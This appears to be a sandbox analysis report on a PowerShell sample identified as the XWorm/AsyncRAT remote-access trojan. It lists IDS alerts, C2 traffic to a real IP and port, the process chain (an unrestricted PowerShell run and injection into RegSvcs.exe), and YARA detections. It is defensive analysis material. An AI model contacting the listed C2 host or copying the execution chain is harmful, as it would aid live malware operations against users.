                                          2024-12-18T08:16:51.430755+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.749723TCP
                                          2024-12-18T08:16:51.433298+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74972392.255.57.1554411TCP
                                          2024-12-18T08:16:58.869971+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.749723TCP
                                          2024-12-18T08:16:59.242947+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.749723TCP
                                          2024-12-18T08:16:59.247247+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74972392.255.57.1554411TCP
                                          2024-12-18T08:17:04.430160+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.749723TCP
                                          2024-12-18T08:17:04.432459+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74972392.255.57.1554411TCP
                                          2024-12-18T08:17:04.621094+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.749723TCP
                                          2024-12-18T08:17:04.622708+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74972392.255.57.1554411TCP
                                          2024-12-18T08:17:04.743277+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.749723TCP
                                          2024-12-18T08:17:04.745103+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74972392.255.57.1554411TCP
                                          2024-12-18T08:17:04.934293+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.749723TCP
                                          2024-12-18T08:17:04.943036+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74972392.255.57.1554411TCP
                                          2024-12-18T08:17:15.291141+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.749723TCP
                                          2024-12-18T08:17:15.295456+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74972392.255.57.1554411TCP
                                          2024-12-18T08:17:15.482157+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.749723TCP
                                          2024-12-18T08:17:15.486296+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74972392.255.57.1554411TCP
                                          2024-12-18T08:17:20.387690+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.749723TCP
                                          2024-12-18T08:17:20.415519+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74972392.255.57.1554411TCP
                                          2024-12-18T08:17:20.728031+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.749723TCP
                                          2024-12-18T08:17:21.133907+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.749723TCP
                                          2024-12-18T08:17:21.143105+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74972392.255.57.1554411TCP
                                          2024-12-18T08:17:21.324994+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.749723TCP
                                          2024-12-18T08:17:21.327680+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74972392.255.57.1554411TCP
                                          2024-12-18T08:17:28.636059+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.749723TCP
                                          2024-12-18T08:17:54.256561+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.749723TCP
                                          2024-12-18T08:17:58.429921+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.749723TCP

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Dec 18, 2024 08:15:29.355488062 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:15:29.475188971 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:15:29.477747917 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:15:29.609026909 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:15:29.728620052 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:15:42.199229002 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:15:42.318876028 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:15:42.687040091 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:15:42.731874943 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:15:42.745507956 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:15:42.865202904 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:15:54.701044083 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:15:54.820631027 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:15:55.132992029 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:15:55.134692907 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:15:55.254213095 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:15:58.442712069 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:15:58.497575045 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:16:07.248007059 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:16:07.367458105 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:16:07.680452108 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:16:07.682241917 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:16:07.801673889 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:16:19.794914961 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:16:19.914587975 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:16:20.460191011 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:16:20.463819027 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:16:20.583278894 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:16:28.596991062 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:16:28.638439894 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:16:32.341955900 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:16:32.461714029 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:16:32.774137974 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:16:32.775980949 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:16:32.895955086 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:16:35.934010983 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:16:36.053518057 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:16:36.366020918 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:16:36.368541956 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:16:36.488812923 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:16:42.861490965 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:16:42.980979919 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:16:43.293961048 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:16:43.296108007 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:16:43.415616989 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:16:50.998294115 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:16:51.117978096 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:16:51.430754900 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:16:51.433298111 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:16:51.552818060 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:16:58.810969114 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:16:58.869971037 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:16:58.930501938 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:16:58.937915087 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:16:59.242947102 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:16:59.247246981 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:16:59.366729975 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:03.998126030 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:04.117598057 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:04.117650032 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:04.237165928 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:04.237276077 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:04.357243061 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:04.430160046 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:04.432459116 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:04.553040981 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:04.621093988 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:04.622708082 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:04.742254019 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:04.743277073 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:04.745102882 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:04.905095100 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:04.934293032 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:04.943036079 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:05.065685987 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:14.857822895 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:14.978384972 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:14.978630066 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:15.098208904 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:15.291141033 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:15.295455933 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:15.414988041 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:15.482156992 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:15.486295938 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:15.605820894 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:19.951476097 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:20.071089983 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:20.295284986 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:20.387690067 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:20.415457010 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:20.415518999 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:20.535651922 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:20.701592922 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:20.728030920 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:20.779344082 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:20.821170092 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:20.821305037 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:20.940855980 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:21.133907080 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:21.143105030 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:21.262614965 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:21.324994087 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:21.327680111 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:21.447242975 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:28.636059046 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:28.695657015 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:53.779639959 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:53.899832964 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:54.256561041 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:54.310758114 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:58.429920912 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:58.482562065 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:59.938184023 CET497234411192.168.2.792.255.57.155

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Dec 18, 2024 08:15:18.578784943 CET1.1.1.1192.168.2.70x84e1No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                          Dec 18, 2024 08:15:18.578784943 CET1.1.1.1192.168.2.70x84e1No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false

                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:02:15:22
                                          Start date:18/12/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\WErY5oc4hl.ps1"
                                          Imagebase:0x7ff741d30000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1427937980.0000021380456000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1427937980.0000021380456000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1427937980.0000021380228000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1427937980.0000021380228000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1427937980.0000021380CF7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1427937980.0000021380CF7000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:1
                                          Start time:02:15:22
                                          Start date:18/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff75da10000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:3
                                          Start time:02:15:24
                                          Start date:18/12/2024
                                          Path:C:\Windows\System32\ipconfig.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\system32\ipconfig.exe" /flushdns
                                          Imagebase:0x7ff613fd0000
                                          File size:35'840 bytes
                                          MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:true

                                          General

                                          Target ID:4
                                          Start time:02:15:25
                                          Start date:18/12/2024
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                          Imagebase:0x390000
                                          File size:45'984 bytes
                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:5
                                          Start time:02:15:25
                                          Start date:18/12/2024
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                          Imagebase:0x4f0000
                                          File size:45'984 bytes
                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000005.00000002.2951130842.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000005.00000002.2951130842.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000005.00000002.2953943377.0000000002861000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:12
                                          Start time:02:17:29
                                          Start date:18/12/2024
                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7560 -s 1704
                                          Imagebase:0xd10000
                                          File size:483'680 bytes
                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Disassembly

                                          Reset < >

                                            Executed Functions

                                            Function 00007FFAAB1F0FA4 Relevance: 3.4, Strings: 1, Instructions: 2134COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1460366798.00007FFAAB1F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB1F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffaab1f0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: H
                                            • API String ID: 0-2852464175
                                            • Opcode ID: 5512062d05ce74beb491e9e7ab7a4983dff983cd87c4dd6edd759e968ddf3003
                                            • Instruction ID: 460aed3a91a8b15f6f4a0d96652c7a2b255e7d7f78f5b9e6b7915a030535ef91
                                            • Opcode Fuzzy Hash: 5512062d05ce74beb491e9e7ab7a4983dff983cd87c4dd6edd759e968ddf3003
                                            • Instruction Fuzzy Hash: F6D25672A0EB898FE7968B7888555B47FE1EF57254B0841FBD08DC71A3DA18AC19C3C1
                                            Function 00007FFAAB12D0E1 Relevance: .2, Instructions: 180COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1459925545.00007FFAAB120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB120000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffaab120000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 67a7fdb011c45f01b69997138c6448491ac0e85a0fac2542f84c141fa47d565a
                                            • Instruction ID: c2035172bd7902b7a06712441f0720f975f35d6ffd8f3f4c75b8cd6e645a3856
                                            • Opcode Fuzzy Hash: 67a7fdb011c45f01b69997138c6448491ac0e85a0fac2542f84c141fa47d565a
                                            • Instruction Fuzzy Hash: D551CF3184E3888FD743DB64C8656E97FB0EF17304F0945EBD088CB1A3DA286A59CB52
                                            Function 00007FFAAB1F1390 Relevance: .2, Instructions: 180COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1460366798.00007FFAAB1F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB1F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffaab1f0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a80878fbca18f70d7becfd7821f921b71edbd9df28a7fa56e725b33247c2c695
                                            • Instruction ID: 3b0035028159792cf9e9f4bd22c633b0d9704f4baa14abc098cc6c3d082bc902
                                            • Opcode Fuzzy Hash: a80878fbca18f70d7becfd7821f921b71edbd9df28a7fa56e725b33247c2c695
                                            • Instruction Fuzzy Hash: 8F51E522A0EB8A8FE796DB6884A46747BE1EF57254B4841FBD40DC71A3DA18DC18D3C1
                                            Function 00007FFAAB12C2FF Relevance: .2, Instructions: 176COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1459925545.00007FFAAB120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB120000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffaab120000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 83c58797bb421ba7b2f2d95f10a0c8877420ee8fa55b91854f625feff951cb6d
                                            • Instruction ID: 1f5c0d2cb31e2449bba671cabb246c98038e6be3bc34a465aebb9c09de029d7c
                                            • Opcode Fuzzy Hash: 83c58797bb421ba7b2f2d95f10a0c8877420ee8fa55b91854f625feff951cb6d
                                            • Instruction Fuzzy Hash: 1F51CF3184E7888FD746DB24C8646E97FB1FF56300F0981EAD149CB1A2DB396A49CB42
                                            Function 00007FFAAB126BE8 Relevance: .2, Instructions: 153COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1459925545.00007FFAAB120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB120000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffaab120000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b106bdc7d3c49bd7882b145509276b16f5b4792d48d0c992bc1967fe67ea7385
                                            • Instruction ID: 5298168180894d65a53e8e1af7b8d397f632768834fafe67801327cbf0f5cbb3
                                            • Opcode Fuzzy Hash: b106bdc7d3c49bd7882b145509276b16f5b4792d48d0c992bc1967fe67ea7385
                                            • Instruction Fuzzy Hash: C451E23180D68CCFDB56EF24D8546EA7BB1FF49304F0441BAD509C71A2DB396A49CB81
                                            Function 00007FFAAB12671E Relevance: .1, Instructions: 145COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1459925545.00007FFAAB120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB120000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffaab120000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 537539fbf26df74ff45233f012078b7a989669f4e80d3c535ba74fb56ce2f972
                                            • Instruction ID: f33ebd77191f4258151070a8d5f040a893a5fc44cd8a02433b0cc12cd54cd472
                                            • Opcode Fuzzy Hash: 537539fbf26df74ff45233f012078b7a989669f4e80d3c535ba74fb56ce2f972
                                            • Instruction Fuzzy Hash: E641B17180978C8FEB95DF68C8586E97BB1FF25304F4441EAD448C71E2DB349948CB81
                                            Function 00007FFAAB1237B5 Relevance: .0, Instructions: 49COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1459925545.00007FFAAB120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB120000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffaab120000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 442d1e8c9cf75f6161b08ff34638c68aa75319f21df4a08437ab04a123a846a8
                                            • Instruction ID: 536cdbf31ac959d517678dd7b52bbeb1a980c8bc6dbaebf9a574b2a6f4d6445a
                                            • Opcode Fuzzy Hash: 442d1e8c9cf75f6161b08ff34638c68aa75319f21df4a08437ab04a123a846a8
                                            • Instruction Fuzzy Hash: 7D01677111CB0D8FDB44EF0CE451AA6B7E0FB95364F10056DE58AC3661D736E882CB45
                                            Function 00007FFAAB125ADD Relevance: .0, Instructions: 21COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1459925545.00007FFAAB120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB120000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffaab120000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6dba4580b13ecee7c4bb55d8115c2e0f5fdfc24978119f2e258db3453e53ecc7
                                            • Instruction ID: dfb1ce6fc13e939d8153a3cff5352d9b8354b1cf73574605dee047c8bf3219e6
                                            • Opcode Fuzzy Hash: 6dba4580b13ecee7c4bb55d8115c2e0f5fdfc24978119f2e258db3453e53ecc7
                                            • Instruction Fuzzy Hash: 4DF01C30D1462A8EDB95DB28C8857E8B7B1AF19340F0044F6904DE62A1DB342AC08F40
                                            Function 00007FFAAB129737 Relevance: .0, Instructions: 12COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1459925545.00007FFAAB120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB120000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffaab120000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: aabcfd91e8f55191a004931a183e6dcb2518b9a1ea28bfbd136d216059383d0f
                                            • Instruction ID: 454b35d459e0accc020eda74aa6f541761551e95c7b0b6db60bb49e2387349be
                                            • Opcode Fuzzy Hash: aabcfd91e8f55191a004931a183e6dcb2518b9a1ea28bfbd136d216059383d0f
                                            • Instruction Fuzzy Hash: C7D0173091A209CFCB4CEF54C2624AD7771AF09348B20407ED40AAA290DB355912CB20

                                            Non-executed Functions

                                            Function 00007FFAAB123D65 Relevance: .2, Instructions: 203COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1459925545.00007FFAAB120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB120000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffaab120000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f939eacb8418b311bb4fd28fe92fcde6aab640bd6f11c2b9b1e0ea830ad13381
                                            • Instruction ID: 138c695da1686214bcd9ec20964d864885a0ca34ec921885f19e59c84c551d85
                                            • Opcode Fuzzy Hash: f939eacb8418b311bb4fd28fe92fcde6aab640bd6f11c2b9b1e0ea830ad13381
                                            • Instruction Fuzzy Hash: AF6160A290E7C69FE313A778AC650E57F60EF1325870D45F7D58D4E0A3ED14680D92A2
                                            Function 00007FFAAB1239AD Relevance: .2, Instructions: 196COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1459925545.00007FFAAB120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB120000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffaab120000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4b9a99825f341e80fe930cf84dd326303e20bd9fe771a9e520ea361dc141e9e6
